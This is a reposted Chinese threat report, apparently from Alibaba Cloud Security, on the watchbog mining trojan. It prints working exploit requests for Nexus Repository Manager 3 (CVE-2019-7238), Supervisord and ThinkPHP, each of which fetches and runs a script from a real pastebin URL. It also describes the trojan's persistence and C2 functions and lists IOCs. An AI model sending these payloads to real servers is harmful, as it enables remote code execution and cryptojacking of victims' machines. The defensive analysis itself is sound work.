威胁快报|Nexus Repository Manager 3新漏洞已被用于挖矿木马传播，建议用户尽快修复...

缺乏、安全感 2022-10-01 12:43 14阅读 0赞

## 背景 ##

近日，阿里云安全监测到watchbog挖矿木马使用新曝光的Nexus Repository Manager 3远程代码执行漏洞(CVE-2019-7238)进行攻击并挖矿的事件。

值得注意的是，这一攻击开始的时间（2月24日），与2月5日上述产品的母公司发布漏洞公告，相隔仅仅半个多月，再次印证了“漏洞从曝光到被黑产用于挖矿的时间越来越短”。此外，攻击者还利用了Supervisord, ThinkPHP等产品的漏洞进行攻击。

本文分析了该木马的内部结构和传播方式，并就如何清理、预防类似挖矿木马给出了安全建议。

## 挖矿木马传播分析 ##

攻击者主要通过直接攻击主机服务的漏洞，来进行木马的传播，也就是说它目前不具备蠕虫的传染性，这一点上类似8220团伙。即便如此，攻击者仍然获取了大量的肉鸡。

尤其2月24日，攻击者从原本只攻击ThinkPHP和Supervisord，到加入了Nexus Repository Manager 3的攻击代码，可以看到其矿池算力当天即飙升约3倍，达到了210KH/s左右（盈利约25美元/天），意味着最高时可能有1~2万台主机受控进行挖矿。

以下为阿里云安全采集到的3种攻击payload

(1) 针对Nexus Repository Manager 3 远程代码执行漏洞(CVE-2019-7238)的利用

POST /service/extdirect HTTP/1.1
    Host: 【victim_ip】:8081
    X-Requested-With: XMLHttpRequest
    Content-Type: application/json
    
    {
         "action": "coreui_Component", "type": "rpc", "tid": 8, "data": [{
         "sort": [{
         "direction": "ASC", "property": "name"}], "start": 0, "filter": [{
         "property": "repositoryName", "value": "*"}, {
         "property": "expression", "value": "233.class.forName('java.lang.Runtime').getRuntime().exec('curl -fsSL https://pastebin.com/raw/zXcDajSs -o /tmp/baby')"}, {
         "property": "type", "value": "jexl"}], "limit": 50, "page": 1}], "method": "previewAssets"}
    复制代码

(2)针对Supervisord远程命令执行漏洞(CVE-2017-11610)的利用

POST /RPC2 HTTP/1.1
    Host: 【victim_ip】:9001
    Content-Type: application/x-www-form-urlencoded
    
    <?xml version=\"1.0\"?>\u0002<methodCall>\u0002<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>\u0002<params>\u0002<param>\u0002<string>curl https://pastebin.com/raw/zXcDajSs -o /tmp/baby</string>\u0002</param>\u0002</params>\u0002</methodCall>
    复制代码

(3)针对ThinkPHP远程命令执行漏洞的利用

POST /index.php?s=captcha HTTP/1.1
    Host: 【victim_host】
    Content-Type: application/x-www-form-urlencoded
    
    _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=curl -fsSL https://pastebin.com/raw/zXcDajSs -o /tmp/baby; bash /tmp/baby
    复制代码

以上三种payload的目的都是相同的，那就是控制主机执行以下命令

curl -fsSL https://pastebin.com/raw/zXcDajSs -o /tmp/baby; bash /tmp/baby
    复制代码

## 木马功能结构分析 ##

被攻击的主机受控访问 [pastebin.com/raw/zXcDajS…][pastebin.com_raw_zXcDajS] ，经多次跳转后，会得到如下图所示的shell脚本，其包含cronlow(), cronhigh(), flyaway()等多个函数。

分析后得出，该脚本主要包含以下几个模块：

1.挖矿模块

挖矿模块的download()函数，会从[ptpb.pw/D8r9][ptpb.pw_D8r9] (即$mi\_64解码后的内容)下载由xmrig改写的挖矿程序，保存为/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog，并从[ptpb.pw/hgZI][ptpb.pw_hgZI] 下载配置文件，之后启动挖矿。

另一个函数testa()也是类似，只不过它下载的是xmr-stak挖矿程序。

2.持久化模块

将要执行的恶意命令写入/etc/cron.d/root等多个文件

3.c&c模块

c&c模块主要在dragon()和flyaway()函数中实现。

如下图所示为解码后的dragon函数

它会依次请求[pastebin.com/raw/05p0fTY…][pastebin.com_raw_05p0fTY] 等多个地址，并执行收到的命令。有趣的是，这些地址目前存放的都是一些普通单词，可能是木马作者留待将来使用。

flyaway()函数则与dragon()稍有不同，它会先从[pixeldra.in/api/downloa…][pixeldra.in_api_downloa] 下载/tmp/elavate。

逆向可知，/tmp/elavate是使用Ubuntu本地权限提升漏洞(CVE-2017-16995)进行提权的二进制程序。提权后，尝试以root权限执行从[pastebin.com/raw/aGTSGJJ…][pastebin.com_raw_aGTSGJJ] 获取的命令。

## 安全建议 ##

阿里云安全已和[pastebin.com][]进行联系，要求禁止对上述恶意下载链接的访问，对方暂未回应。此外，云安全为用户提供如下安全建议：

1.  互联网上攻击无处不在，用户平时应及时更新服务，或修补服务漏洞，避免成为入侵的受害者。
2.  建议使用阿里云安全的下一代云防火墙产品，其阻断恶意外联、能够配置智能策略的功能，能够有效帮助防御入侵。哪怕攻击者在主机上的隐藏手段再高明，下载、挖矿、反弹shell这些操作，都需要进行恶意外联；云防火墙的拦截将彻底阻断攻击链。此外，用户还可以通过自定义策略，直接屏蔽[pastebin.com][]、[thrysi.com][]等广泛被挖矿木马利用的网站，达到阻断入侵的目的。
3.  对于有更高定制化要求的用户，可以考虑使用阿里云安全管家服务。购买服务后将有经验丰富的安全专家提供咨询服务，定制适合您的方案，帮助加固系统，预防入侵。入侵事件发生后，也可介入直接协助入侵后的清理、事件溯源等，适合有较高安全需求的用户，或未雇佣安全工程师，但希望保障系统安全的企业。

## IOC ##

矿池地址：  
[pool.minexmr.com:443][pool.minexmr.com_443]

钱包地址：  
44gaihcvA4DHwaWoKgVWyuKXNpuY2fAkKbByPCASosAw6XcrVtQ4VwdHMzoptXVHJwEErbds66L9iWN6dRPNZJCqDhqni3B

相关文件：

其他恶意url：  
[pastebin.com/raw/AgdgACU…][pastebin.com_raw_AgdgACU]  
[pastebin.com/raw/vvuYb1G…][pastebin.com_raw_vvuYb1G]  
[pixeldra.in/api/downloa…][pixeldra.in_api_downloa 1] (用来下载32位XMR挖矿程序，链接已失效)  
[pastebin.com/raw/aGTSGJJ…][pastebin.com_raw_aGTSGJJ] （目前不存在）  
[pastebin.com/raw/05p0fTY…][pastebin.com_raw_05p0fTY]  
[pastebin.com/raw/KxWPFeE…][pastebin.com_raw_KxWPFeE]  
[pastebin.com/raw/X6wvuv9…][pastebin.com_raw_X6wvuv9]

**Reference**

1.  [support.sonatype.com/hc/en-us/ar…][support.sonatype.com_hc_en-us_ar]
2.  [cloud.tencent.com/developer/a…][cloud.tencent.com_developer_a]
3.  [github.com/brl/grlh/bl…][github.com_brl_grlh_bl]

[原文链接][github.com_brl_grlh_bl]

[本文为云栖社区原创内容，未经允许不得转载。][github.com_brl_grlh_bl]

转载于:https://juejin.im/post/5c88b48ef265da2dc00695e7

[pastebin.com_raw_zXcDajS]: https://link.juejin.im?target=http%3A%2F%2Flink.zhihu.com%2F%3Ftarget%3Dhttps%253A%2F%2Fpastebin.com%2Fraw%2FzXcDajSs
[ptpb.pw_D8r9]: https://link.juejin.im?target=http%3A%2F%2Flink.zhihu.com%2F%3Ftarget%3Dhttps%253A%2F%2Fptpb.pw%2FD8r9
[ptpb.pw_hgZI]: https://link.juejin.im?target=http%3A%2F%2Flink.zhihu.com%2F%3Ftarget%3Dhttps%253A%2F%2Fptpb.pw%2FhgZI
[pastebin.com_raw_05p0fTY]: https://link.juejin.im?target=http%3A%2F%2Flink.zhihu.com%2F%3Ftarget%3Dhttps%253A%2F%2Fpastebin.com%2Fraw%2F05p0fTYd
[pixeldra.in_api_downloa]: https://link.juejin.im?target=http%3A%2F%2Flink.zhihu.com%2F%3Ftarget%3Dhttps%253A%2F%2Fpixeldra.in%2Fapi%2Fdownload%2F8iFEEg
[pastebin.com_raw_aGTSGJJ]: https://link.juejin.im?target=http%3A%2F%2Flink.zhihu.com%2F%3Ftarget%3Dhttps%253A%2F%2Fpastebin.com%2Fraw%2FaGTSGJJp
[pastebin.com]: https://link.juejin.im?target=http%3A%2F%2Flink.zhihu.com%2F%3Ftarget%3Dhttp%253A%2F%2Fpastebin.com
[thrysi.com]: https://link.juejin.im?target=http%3A%2F%2Flink.zhihu.com%2F%3Ftarget%3Dhttp%253A%2F%2Fthrysi.com
[pool.minexmr.com_443]: https://link.juejin.im?target=http%3A%2F%2Flink.zhihu.com%2F%3Ftarget%3Dhttp%253A%2F%2Fpool.minexmr.com%253A443
[pastebin.com_raw_AgdgACU]: https://link.juejin.im?target=http%3A%2F%2Flink.zhihu.com%2F%3Ftarget%3Dhttps%253A%2F%2Fpastebin.com%2Fraw%2FAgdgACUD
[pastebin.com_raw_vvuYb1G]: https://link.juejin.im?target=http%3A%2F%2Flink.zhihu.com%2F%3Ftarget%3Dhttps%253A%2F%2Fpastebin.com%2Fraw%2FvvuYb1GC
[pixeldra.in_api_downloa 1]: https://link.juejin.im?target=http%3A%2F%2Flink.zhihu.com%2F%3Ftarget%3Dhttps%253A%2F%2Fpixeldra.in%2Fapi%2Fdownload%2FnZ2s4L
[pastebin.com_raw_KxWPFeE]: https://link.juejin.im?target=http%3A%2F%2Flink.zhihu.com%2F%3Ftarget%3Dhttps%253A%2F%2Fpastebin.com%2Fraw%2FKxWPFeEn
[pastebin.com_raw_X6wvuv9]: https://link.juejin.im?target=http%3A%2F%2Flink.zhihu.com%2F%3Ftarget%3Dhttps%253A%2F%2Fpastebin.com%2Fraw%2FX6wvuv98
[support.sonatype.com_hc_en-us_ar]: https://link.juejin.im?target=http%3A%2F%2Flink.zhihu.com%2F%3Ftarget%3Dhttps%253A%2F%2Fsupport.sonatype.com%2Fhc%2Fen-us%2Farticles%2F360017310793-CVE-2019-7238-Nexus-Repository-Manager-3-Missing-Access-Controls-and-Remote-Code-Execution-February-5th-2019
[cloud.tencent.com_developer_a]: https://link.juejin.im?target=http%3A%2F%2Flink.zhihu.com%2F%3Ftarget%3Dhttps%253A%2F%2Fcloud.tencent.com%2Fdeveloper%2Farticle%2F1390628
[github.com_brl_grlh_bl]: https://link.juejin.im?target=http%3A%2F%2Flink.zhihu.com%2F%3Ftarget%3Dhttps%253A%2F%2Fyq.aliyun.com%2Farticles%2F692114%253Futm_content%253Dg_1000046360